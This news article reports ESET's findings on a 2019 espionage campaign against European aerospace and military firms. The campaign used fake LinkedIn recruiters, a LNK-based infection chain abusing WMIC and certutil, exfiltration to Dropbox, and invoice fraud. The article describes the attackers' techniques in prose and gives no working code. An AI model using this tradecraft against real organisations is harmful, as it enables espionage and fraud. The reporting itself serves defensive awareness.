European aerospace and military blue chips have been targeted by a sophisticated espionage campaign that involved the use of previously unseen malware, as well as social engineering, security firm ESET has revealed — after an investigation conducted alongside two of the affected firms.
The attackers took their first step to infiltrating the networks by luring employees in with the promise of a job from a rival business, then slipping malware into documents purportedly containing further information about roles. The attackers set up LinkedIn profiles masquerading as recruiters at major contractors Collins Aerospace and General Dynamics.
In a report released this week by Slovakia-headquartered ESET, the company said the attacks were launched between September and December 2019.
(To a casual observer and perhaps as a native English speaker, the LinkedIn overtures look deeply unconvincing and notably suspicious: “As you are a reliable elite, I will recommend you to our very important department“, reads one message. Viewing them is a reminder that social engineering attacks often do not to be polished to still be hugely effective as a threat vector).
The initial shared file did contain salary details, but it was a decoy.
“The shared file was a password-protected RAR archive containing a LNK file,” said ESET. “When opened, the LNK file started a Command Prompt that opened a remote PDF file in the target’s default browser.”
“In the background, the Command Prompt created a new folder and copied the WMI Commandline Utility (WMIC.exe) to this folder, renaming the utility in the process. Finally, it created a scheduled task, set to execute a remote XSL script periodically via the copied WMIC.exe.”
Content from our partners
ESET has publised IOCs on its GitHub repo here
Once in, the malware was significantly more sophisticated than the social engineering attempts: “The attackers used WMIC to interpret remote XSL scripts, certutil to decode base64-encoded downloaded payloads, and rundll32 and regsvr32 to run their custom malware,” ESET said.
Malware flow. Credit: ESET
Once in the system the attackers were able to do two things. One was to look around for sensitive information, that they exfiltrated using custom built, open source code that uploaded files onto a DropBox account.
The other was to harvest internal data to carry out further Business Email Compromise scams on staff across the company. Worryingly, the attackers also digitally signed some components of their malware, including a custom downloader and backdoor, and the dbxcli tool.
“The certificate was issued in October 2019 – while the attacks were active – to 16:20 Software, LLC.,” ESET noted.
Read This! US Agency in Fresh North Korean Hacker Warning
Later in the campaign, the attackers also sought to monetise their access, by finding unpaid invoices and attempting to exploit these.
“They followed up the conversation and urged the customer to pay the invoice, however, to a different bank account than previously agreed (see Figure 8), to which the customer responded with some inquiries.
“As part of this ruse, the attackers registered an identical domain name to that of the compromised company, but on a different top-level domain, and used an email associated with this fake domain for further communication with the targeted customer”.
This is where they were thwarted, however, as an alert customer checked in on a legitimate email address at the aerospace company to enquire about the shady request and the scam was flagged.
Ultimately neither malware analysis nor the broader investigation allowed post-incident response to “gain insight” into what files the Operation In(ter)ception attackers were after”, ESET says: “However, the job titles of the employees targeted via LinkedIn suggest that the attackers were interested in technical and business-related information.”
It tentatively attributed the attack to the North Korean APT, Lazarus, saying “we have seen a variant of the Stage 1 malware that carried a sample of Win32/NukeSped.FX, which belongs to a malicious toolset that ESET attributes to the Lazarus group” but admitted it lacks compelling evidence.
Attackers for high value targets like this can be persistent, creative, and use some unusual techniques. Earlier this year a leading UK cybersecurity law enforcement officer warned CISOs that he was seeing a “much larger increase in physical breaches” , with cybercrime groups planting moles in cleaning agencies to gain hardware access.
